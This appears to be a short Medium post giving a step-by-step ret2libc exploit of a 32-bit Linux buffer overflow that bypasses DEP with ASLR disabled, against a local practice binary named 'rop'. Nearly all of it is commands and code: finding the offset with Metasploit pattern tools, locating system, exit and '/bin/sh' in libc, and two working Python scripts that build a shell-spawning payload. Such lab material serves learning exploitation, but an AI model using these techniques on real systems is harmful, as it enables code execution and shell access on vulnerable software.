Linux Buffer overflow Data Execution Prevention(DEP) bypass with ASLR disabled

32 bit os
gdb ropr Golu
/usr/bin/msf-pattern_create -l 100
r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
/usr/bin/msf-pattern_offset -q b7Ab -l 100
pattern_offset 0x41474141
r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
0 means protection is disabled
cat /proc/sys/kernel/randomize_va_space
ldd rop
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit
strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
#!/usr/bin/python3
from pwn import *
junk= b'A'*52
libc_addr = p32(0xb7e19000, endian='little')
system_addr = p32(0xb7e19000+0x0003ada0, endian='little')
exit_addr = p32(0xb7e19000+0x0002e9d0, endian='little')
binsh_addr = p32(0xb7e19000+0x0015ba0b, endian='little')
payload = junk + system_addr + exit_addr + binsh_addr
f=open("payload.txt","wb")
f.write(payload)
f.close()
/home/ayush/.binary/rop `cat payload.txt`
#!/usr/bin/python2
import struct
junk= 'A'*52
libc_addr = 0xb7e19000
system_addr = struct.pack("<I",libc_addr + 0x0003ada0)
exit_addr = struct.pack("<I",libc_addr + 0x0002e9d0)
binsh_addr = struct.pack("<I",libc_addr + 0x0015ba0b)
payload_addr = junk + system_addr + exit_addr + binsh_addr
print payload_addr

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store